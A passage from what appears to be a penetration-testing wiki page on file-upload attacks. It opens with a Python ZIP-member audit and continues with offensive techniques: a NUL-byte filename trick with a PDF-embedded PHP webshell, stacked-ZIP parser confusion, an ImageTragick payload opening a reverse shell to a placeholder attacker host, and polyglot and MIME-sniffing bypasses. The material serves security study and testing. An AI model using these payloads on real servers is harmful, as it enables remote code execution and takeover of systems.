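    name = info.filename.replace("\\", "/")
    if stat.S_ISLNK(info.external_attr >> 16):
        return "symlink member"
    if posixpath.isabs(name) or (len(name) > 1 and name[1] == ":"):
        return "absolute path"
    if ".." in name.split("/"):
        return "path traversal"
    # normpath keeps this deterministic offline; on a live system use realpath
    # on dest so a symlinked upload directory is resolved before the comparison
    base = os.path.normpath(dest)
    target = os.path.normpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        return "escapes destination"
    return None


def audit_zip(archive_bytes, dest):
    """Map every member name to its rejection reason (None = would extract)."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as z:
        return {info.filename: classify_member(info, dest) for info in z.infolist()}


def safe_extract(archive_bytes, dest):
    """Extract only the members audit_zip accepts; returns the rejected ones."""
    report = audit_zip(archive_bytes, dest)
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as z:
        for info in z.infolist():
            if report[info.filename] is None:
                z.extract(info, dest)
    return {name: reason for name, reason in report.items() if reason is not None}


if __name__ == "__main__":
    evil = build_archive(
        {"../../../../../var/www/html/webserver/shell.php": b"<?php ?>", "otherfile.xml": b"<x/>"},
        symlinks={"symindex.txt": "../../../index.php"},
    )
    for name, reason in audit_zip(evil, "/var/www/uploads").items():
        print(f"{reason or 'ok':16s} {name}")
```

The audit deliberately looks at the member as stored rather than at what the extracting library would do with it: a server that shells out to unzip, or uses a library that follows symlinks or honours leading ../, gets the same verdict from this check before any of those tools run.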
ZIP NUL-byte filename smuggling (PHP ZipArchive confusion)
When a backend validates ZIP entries with PHP's ZipArchive but the extraction writes to the filesystem using the raw names, you can hide a disallowed extension by embedding a NUL (0x00) in the filename fields. The validation side works on the whole, length-prefixed name (PHP strings are binary-safe), while the extraction side hands the name to C filesystem calls, which stop at the first NUL and drop everything behind it.
High-level flow:
- Create a valid container file (e.g. a valid PDF) that embeds a tiny PHP stub in a stream so the magic/MIME stays PDF.
- Name it something like shell.php..pdf, zip it, then hex-edit the ZIP local header and the central directory name to change the first . after .php into 0x00, giving shell.php\x00.pdf.
- Validators relying on ZipArchive "see" shell.php\x00.pdf, which ends in .pdf, and allow it; the extractor writes shell.php to disk, leading to RCE if the upload folder is executable.
Minimal PoC steps:
# 1) Build a polyglot PDF containing a tiny webshell (still a valid PDF)
printf '%b' '%PDF-1.3\n1 0 obj<<>>stream\n<?php system($_REQUEST["cmd"]); ?>\nendstream\nendobj\n%%EOF' > embedded.pdf
# 2) Trick name and zip
cp embedded.pdf shell.php..pdf
zip null.zip shell.php..pdf
# 3) Hex-edit both the local header and central directory filename fields
# Replace the dot right after ".php" with 00 (NUL) => shell.php\x00.pdf
# Tools: hexcurse, bless, bvi, wxHexEditor, etc.
# 4) Local validation behavior
php -r '$z=new ZipArchive; $z->open("null.zip"); echo $z->getNameIndex(0),"\n";'
# -> pipe the output through xxd to see whether the name comes back whole (a 00 byte, so it ends in .pdf) or is cut at the NUL
Notes
- Change BOTH filename occurrences (local header and central directory). Some tools add an extra data descriptor entry too; adjust all name fields if present.
- The payload file must still pass server-side magic/MIME sniffing. Embedding the PHP in a PDF stream keeps the header valid.
- It works whenever the enumeration/validation path and the extraction/write path disagree about how to handle strings.
Stacked/concatenated ZIPs (parser disagreement)
Concatenating two valid ZIP files creates a blob where different parsers settle on different End Of Central Directory (EOCD) records. Many tools locate the last EOCD, while some libraries (e.g. ZipArchive in specific workflows) may parse the first archive they encounter. If validation enumerates the first archive and extraction uses another tool that honours the last EOCD, a benign archive can pass the checks while the malicious one gets extracted.
PoC:
# Build two separate archives
printf test > t1; printf test2 > t2
zip zip1.zip t1; zip zip2.zip t2
# Stack them
cat zip1.zip zip2.zip > combo.zip
# Different views
unzip -l combo.zip # warns about extra bytes; often lists entries from the last archive
php -r '$z=new ZipArchive; $z->open("combo.zip"); for($i=0;$i<$z->numFiles;$i++) echo $z->getNameIndex($i),"\n";'
Abuse example
- Create a benign archive (allowed type, e.g. PDF) and a second archive that contains a forbidden extension (e.g. shell.php).
- Concatenate them: cat benign.zip evil.zip > combined.zip.
- If the server validates with one parser (sees benign.zip) but extracts with another (processes evil.zip), the forbidden file lands in the extraction path.
ImageTragic
Upload this content with an image extension to exploit the vulnerability (ImageMagick, 7.0.1-1) (from the exploit)
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
Embedding a PHP shell in a PNG
Embedding a PHP shell in the IDAT chunk of a PNG file can effectively bypass certain image processing operations. The functions imagecopyresized and imagecopyresampled from PHP-GD are particularly relevant here, as they are commonly used for resizing and resampling images, respectively. The ability of the embedded PHP shell to remain unaffected by these operations is a significant advantage for certain use cases.
A detailed exploration of this technique, including its methodology and potential applications, is provided in the following article: "Encoding Web Shells in PNG IDAT chunks". This resource offers a comprehensive understanding of the process and its implications.
More information: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
Polyglot Files
Polyglot files serve as a unique tool in cybersecurity, acting as chameleons that can validly exist in multiple file formats simultaneously. An intriguing example is a GIFAR, a hybrid that functions both as a GIF and as a RAR archive. Such files aren't limited to this pairing; combinations like GIF and JS or PPT and JS are also feasible.
The core utility of polyglot files lies in their capacity to circumvent security measures that screen files based on type. Common practice in various applications entails permitting only certain file types for upload (like JPEG, GIF, or DOC) to mitigate the risk posed by potentially harmful formats (e.g. JS, PHP, or Phar files). However, a polyglot, by conforming to the structural criteria of multiple file types, can stealthily bypass these restrictions.
Despite their adaptability, polyglots do encounter limitations. For instance, while a polyglot might simultaneously embody a PHAR file (PHp ARchive) and a JPEG, the success of its upload might hinge on the platform's file extension policies. If the system is stringent about allowable extensions, the mere structural duality of a polyglot may not suffice to guarantee its upload.
More information: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
Upload valid JSONs as if they were PDFs
How to avoid file type detection by uploading a valid JSON file even if not allowed, by faking a PDF (techniques from this blog post):
- mmmagic library: as long as the %PDF magic bytes are within the first 1024 bytes of the file it's considered valid (see the example in the post)
- pdflib library: add a fake PDF structure inside a field of the JSON so the library thinks it's a PDF (see the example in the post)
- file binary: it reads up to 1048576 bytes from the file. Create a JSON bigger than that so it can't parse the content as JSON, then put the initial part of a real PDF inside the JSON and it will think it's a PDF
References
- When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files
- https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html
- https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
- https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
- usd HeroLab: Gibbon LMS arbitrary file write (CVE-2023-45878)
- HTB: Media: WMP NTLM leak, NTFS junction to webroot RCE, FullPowers + GodPotato to SYSTEM
- 0xdf, HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion, PHP RCE)